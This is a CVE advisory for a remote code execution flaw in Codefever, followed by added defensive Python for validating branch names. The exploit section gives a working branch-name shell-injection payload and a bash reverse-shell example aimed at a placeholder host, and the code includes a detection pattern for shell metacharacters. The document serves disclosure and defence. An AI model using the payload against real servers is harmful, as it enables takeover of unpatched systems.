CVE-2023-44080: CVE-2023-44080.md
An issue in PGYER codefever v.2023.8.14-2ce4006 allows a remote attacker to execute arbitrary code via a crafted request to the branchList component.
Remote Code Execution Vulnerability in Codefever up to 2023.8.14-2ce4006
CVE-ID: CVE-2023-44080
Attack type: Remote Code Execution
FOFA Keyword: icon_hash="-391103642"
Date: August 13, 2023
Exploit Author: pyy
Vendor Homepage: https://www.pgyer.com/ https://codefever.pgyer.com/
Software Link: https://github.com/PGYER/codefever
Version: up to 2023.8.14-2ce4006
Suggested description of the vulnerability for use in the CVE: Codefever up to 2023.8.14-2ce4006 was discovered to contain a remote code execution (RCE) vulnerability via the component /application/controllers/api/repository.php.
By default, arbitrary remote code execution (RCE) can be achieved on Codefever either by directly registering a new account (by default, Codefever allows arbitrary users to register new accounts) or by obtaining a low-privilege account on the target system that is allowed to create a new branch in any project.
EXP
The attack can be carried out by following these steps:
Register an account (registration is enabled for anyone by default) and create a repository (an existing repository can also be used)
Clone the repository, create a normal branch, then push it
Create a branch with the branch name containing exploit code
git checkout -b "&&echo$IFS$9{{command}}|base64$IFS$9-d|bash&&"
Here {{command}} is the base64 encoding of the command to be executed. For example, bash -c 'bash -i >& /dev/tcp/ip/port 0>&1' base64 encoded.
Then create a pull request (press 合并请求 ("Merge Request") on the page)
Getshell
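Defensive counterpart to the steps above, added here as an example (not Codefever's own code): a branch-name check a server should apply before a name reaches any git command, using the advisory's branch-name pattern as a constructed test input. The regexes, function names and the list_branches helper are assumptions, not part of the project.

```python
"""Server-side branch-name validation (added example, not Codefever code).
Applies git's own check-ref-format rules plus a conservative allowlist, so a
name built from shell metacharacters is rejected before a git command is
assembled, and shows an argv-style invocation that never involves a shell.
"""
import re
import subprocess

# Characters/sequences git itself forbids in a ref (git-check-ref-format(1)).
_GIT_FORBIDDEN = re.compile(r'[\x00-\x20\x7f~^:?*\[\\]|\.\.|@\{|//')
# Conservative allowlist: what a legitimate branch name looks like.
_ALLOWED = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._/-]{0,254}$')
# Shell metacharacters; any of these in a branch name is worth alerting on.
_SHELL_META = re.compile(r'[;&|`$<>(){}\'"!\n]')


def git_ref_ok(name: str) -> bool:
    """Names git would refuse anyway (structural rules only)."""
    if not name or name == '@':
        return False
    if name.startswith(('/', '-')) or name.endswith(('.', '/', '.lock')):
        return False
    if _GIT_FORBIDDEN.search(name):
        return False
    return all(not part.startswith('.') for part in name.split('/'))


def branch_name_ok(name: str) -> bool:
    """Strict check to run before a branch name reaches any git command."""
    return git_ref_ok(name) and bool(_ALLOWED.fullmatch(name))


def looks_like_injection(name: str) -> bool:
    """Detection helper for auditing existing refs or request logs."""
    return bool(_SHELL_META.search(name)) or '$IFS' in name


def list_branches(repo_path: str, branch: str) -> list:
    """Safe pattern: validated name, argv list (no shell), '--' terminator."""
    if not branch_name_ok(branch):
        raise ValueError('invalid branch name: %r' % branch)
    out = subprocess.run(['git', '-C', repo_path, 'branch', '--list', '--', branch],
                         capture_output=True, text=True, check=True).stdout
    return [line.strip('* \t') for line in out.splitlines() if line.strip()]


# Constructed samples: two normal names, the advisory's pattern, a traversal.
SAMPLE_NAMES = ['feature/login-fix', 'release-2023.08',
                '&&echo$IFS$9{{command}}|base64$IFS$9-d|bash&&', '../../etc']
```

Note that git_ref_ok accepts the advisory's pattern: git's own rules allow `&`, `|` and `$`, so the allowlist and a shell-free invocation are what actually stop the injection.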
More Information
Browse this for more information. (I cannot upload photos to a GitHub Gist.)